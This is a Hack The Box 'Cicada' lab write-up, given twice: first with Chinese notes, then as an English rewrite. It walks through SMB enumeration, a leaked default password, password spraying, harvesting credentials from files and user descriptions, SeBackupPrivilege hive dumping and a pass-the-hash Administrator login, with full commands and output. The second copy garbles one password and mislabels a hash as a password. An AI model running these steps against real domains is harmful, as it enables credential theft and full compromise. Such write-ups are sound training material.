htb cicada
Information Gathering
# Nmap 7.98 scan initiated Thu Jan 1 08:52:11 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.13s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-01 15:22:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-01T15:23:37+00:00; +6h29m42s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1: 2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
|_SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-01T15:23:37+00:00; +6h29m42s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1: 2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
|_SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-01T15:23:37+00:00; +6h29m42s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1: 2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
|_SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1: 2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
|_SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
|_ssl-date: 2026-01-01T15:23:38+00:00; +6h29m42s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/1%Time=695635D0%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.858 days (since Tue Dec 30 12:18:10 2025)
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-01T15:22:57
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h29m41s, deviation: 0s, median: 6h29m41s
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 1 08:53:56 2026 -- 1 IP address (1 host up) scanned in 104.94 secondsVulnerability Analysis
➜ Cicada nxc smb cicada.htb -u 'guest' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share➜ Cicada smbclient //cicada.htb/HR -N
smb: \> more "Notice from HR.txt"Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada CorpExploitation (User Flag)
Cicada$M6Corpb*@Lp#nZp!8有了密码就要寻找用户
枚举域
cat a.txt|grep 'SidTypeUser'|awk '{print $2}' > users.txt
密码喷洒:nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
→SMB 10.10.11.35 445 CICADA-DC [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
没有更多的共享可以访问
枚举其他用户
➜ Cicada nxc smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.35 445 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain
SMB 10.10.11.35 445 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.35 445 CICADA-DC krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account
SMB 10.10.11.35 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 1
SMB 10.10.11.35 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1
SMB 10.10.11.35 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB 10.10.11.35 445 CICADA-DC david.orelious 2024-03-14 12:17:29 0 Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 0david.orelious:aRt$Lp#7t*VQ!3
➜ Cicada nxc smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share可以访问DEV
共享中找到Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"emily.oscars:Q!3@Lp#M6b*7t*Vt
尝试evil-winrm
evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Privilege Escalation (Root Flag)
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled根据此文章
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam C:\temp\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system C:\temp\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\temp> download sam.hive
Info: Downloading C:\temp\sam.hive to sam.hive
Info: Download successful!
*Evil-WinRM* PS C:\temp> download system.hive
Info: Downloading C:\temp\system.hive to system.hive➜ Cicada impacket-secretsdump -sam sam.hive -system system.hive LOCAL
# 破解即可2b87e7c93a3e8a0ea4a581937016f341evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb
Lessons Learned
htb cicada
Information Gathering
# Nmap 7.98 scan initiated on Thu Jan 1 08:52:11 2026 using the command: `/usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.35`
Nmap scan report for 10.10.11.35:
The host is online (latency: 0.13 seconds).
988 TCP ports were not displayed due to no response.
PORT STATE SERVICE VERSION
53/tcp OPEN domain (Generic DNS response: NOTIMP)
| Fingerprint strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp OPEN kerberos-sec Microsoft Windows Kerberos (Server time: 2026-01-01 15:22:10Z)
135/tcp OPEN msrpc Microsoft Windows RPC
139/tcp OPEN netbios-ssn Microsoft Windows netbios-ssn
389/tcp OPEN ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_SSL-date: 2026-01-01T15:23:37+00:00; +6h29m42s relative to scanner time.
| SSL-cert:
| Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Valid from: 2024-08-22T20:24:16
| Valid until: 2025-08-22T20:24:16
| MD5: 9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1: 2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
| SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
445/tcp OPEN microsoft-ds?
464/tcp OPEN kpasswd5?
593/tcp OPEN ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp OPEN ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_SSL-date: 2026-01-01T15:23:37+00:00; +6h29m42s relative to scanner time.
| SSL-cert:
| Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Valid from: 2024-08-22T20:24:16
| Valid until: 2025-08-22T20:24:16
| MD5: 9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1: 2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
| SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
3268/tcp OPEN ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_SSL-date: 2026-01-01T15:23:37+00:00; +6h29m42s relative to scanner time.
| SSL-cert:
| Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Valid from: 2024-08-22T20:24:16
| Valid until: 2025-08-22T20:24:16
| MD5: 9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1: 2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
| SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
3269/tcp OPEN ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_SSL-date: 2026-01-01T15:23:38+00:00; +6h29m42s relative to scanner time.
5985/tcp OPEN http Microsoft HTTPAPI (SSDP/UPnP)
|_HTTP-title: Not found
|_HTTP-server-header: Microsoft-HTTPAPI/2.0
One service could not be identified despite data being returned. If you know the service and version, please submit the following information at:
https://nmap.org/cgi-bin/submit.cgi?new-service:
SF-Port53-TCP:V=7.98%I=7%D=1/1%Time=695635D0%P=x86_64-pc-linux-gnu%r(DNSVeVersionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because at least one open and one closed port could not be found.
Device type: General purpose.
Possible operating systems: Microsoft Windows 2022, 2012, or 2016 (89% probability).
OS CPE (Common Platform Enumeration): cpe:/o:microsoft:windows_server_2022, cpe:/o:microsoft:windows_server_2012:r2, cpe:/o:microsoft:windows_server_2016.
Probable operating systems: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%).
No exact OS match was found for the host (test conditions were not ideal).
Uptime estimate: 1.858 days (since Tue Dec 30 12:18:10 2025).
TCP sequence prediction difficulty: 264 (Difficult).
IP address sequence generation: Incremental.
Service information: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows.
Host script results:
| smb2-time:
| Date: 2026-01-01T15:22:57
|_ Start date: N/A
| smb2-security-mode:
| Version: 3.1.1
|_ Message signing is enabled and required
|_ Clock skew: Mean: 6h29m41s, Deviation: 0s, Median: 6h29m41s
Data files were read from: /usr/share/nmap
OS and service detection was performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap completed on Thu Jan 1 08:53:56 2026: 1 IP address (1 host up) was scanned in 104.94 seconds.
# Vulnerability Analysis
```bash
➜ cicada nxc smb cicada.htb -u 'guest' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC [*] Shares have been enumerated.
SMB 10.10.11.35 445 CICADA-DC Share details:
Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin access
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ access
SMB 10.10.11.35 445 CICADA-DC IPC$ READ access Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share➜ cicada smbclient //cicada.htb/HR -N
smb: \> more "Notice from HR.txt"Dear new hire!
Welcome to Cicada Corp! We’re thrilled to have you join our team. As part of our security protocols, it’s essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:- Log in to your Cicada Corp account using the provided username and the default password mentioned above.
- Once logged in, navigate to your account settings or profile settings section.
- Look for the option to change your password. This will be labeled as “Change Password”.
- Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
- After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don’t hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards, Cicada Corp
Exploitation (User Flag)
Cicada$M6Corpb*@Lp#nZp!8 now has the password; it needs to find users.
Enumerating domains:
cat a.txt | grep 'SidTypeUser' | awk '{print $2}' > users.txtPassword spraying:
nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'Output:
SMB 10.10.11.35 445 CICADA-DC [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8No additional shares can be accessed.
Enumerating other users:
➜ cicada nxc smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --usersOutput:
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain
SMB 10.10.11.35 445 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.35 445 CICADA-DC krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account
SMB 10.10.11.35 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 1
SMB 10.10.11.35 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1
SMB 10.10.11.35 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB 10.10.11.35 445 CICADA-DC david.orelious 2024-03-14 12:17:29 0 Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 0The password for david.orelious is aRt$Lp#7t*VQ!3.
➜ cicada nxc smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Shares listed
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
The "DEV" share can be accessed.
The file Backup_script.ps1 was found in the shared resources.
```powershell
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"Username used: emily.oscars:Q!3@Lp#M6b*7t*Vt
Trying to use evil-winrm:
`evil-winrm -i cicada.htb -u emily.oscars -p ‘Q!3@Lp#M6b7tVt’
# Privilege Escalation (Root Flag)
```bash
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
Privilege Information
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledAccording to this article:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam C:\temp\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system C:\temp\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\temp> download sam.hive
Info: Downloading C:\temp\sam.hive to sam.hive
Info: Download successful!
*Evil-WinRM* PS C:\temp> download system.hive
Info: Downloading C:\temp\system.hive to system.hive➜ cicada impacket-secretsdump -sam sam.hive -system system.hive LOCAL
# The password is 2b87e7c93a3e8a0ea4a581937016f341evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb